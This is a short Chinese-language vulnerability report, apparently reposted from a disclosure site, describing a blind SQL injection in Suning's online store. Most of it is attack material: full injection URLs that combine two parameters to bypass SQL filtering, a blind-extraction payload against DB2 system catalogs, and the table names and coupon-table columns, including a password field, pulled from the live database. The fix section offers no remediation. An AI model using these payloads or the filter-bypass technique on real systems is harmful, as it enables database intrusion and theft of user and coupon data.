初始访问: https://www.suning.com/emall/SNNetStoreView?storeId=11554&catalogId=10654&langId=-7&from=index&storeType=0&storeName=&reqProvince=&reqCity= 注入地址: https://www.suning.com/emall/SNNetStoreInfoView?cityId1=9137&dist1=aa%27or%201=1/*&storeName=*/-- 注入参数:dist1 和storeName ,结合,绕过SQL防注。 如盲注猜解: https://www.suning.com/emall/SNNetStoreInfoView?cityId1=9137&storeName=*/from%20syscat.schemata%20fetch%20first%201%20rows%20only%29,1,1%29%29%3E10--&dist1=aa%27or%20ascii%28SUBSTR%28%28select%20schemaname/* 不知道用户名在不在了,盲注,猜解比较慢。下面是简单猜解的一些表什么的。 漏洞 证明:盲注猜解: 'ADVISE_INDEX','ADVISE_WORKLOAD','DMUSERBHVR','GRUSERAUTH','ORDUSERS','USERDEMO','USERLOCK','USERPROF','USERPVCDEV','USERPWDHST','USERREG','USERS','USER_QA','XACTJOINUSER','XGPUSERREL','XIPUSERS','XMEMBERCARDUSERS','XROULETTEUSERCOUNT','XROULETTEUSERS','XSECKILLUSERREL','XSENDUSERS','XSENDUSERS_BAK','XSMARTUSERCOUNT','XTMPUSERS','XUSERGRADE','XUSERGRADECONF','XUSERPREFER','ZST_USER','ZST_USER_ROLE','USEROPTIONS','SYSUSERAUTH','SYSUSEROPTIONS' 表:XCOUPON (优惠券) 'CHARGEDATE','CODE','COUPONGROUP_ID','COUPONTMP_ID','COUPON_ID','COUPON_NO','COUPON_TYPE','CREATED_BY','CREATED_DATE','DELIVERDATE','DESCRIPTION','ENDDATE','FIELD1','FIELD2','FIELD3','LAST_UPDATED','LEVEL','MARKFORDELETE','NAME','NOTES','OPTCOUNTER','ORDERS_ID','PAR_VALUE','PASSWORD','REMAININGAMOUNT','SERIALNUMBER','SOURCE_ID','SOURCE_TYPE','STARTDATE','STATUS','UPDATED_BY','USERS_ID' 修复方案: 你懂得!
查看更多关于苏宁易购某DB2盲注 - 网站安全 - 自学php的详细内容...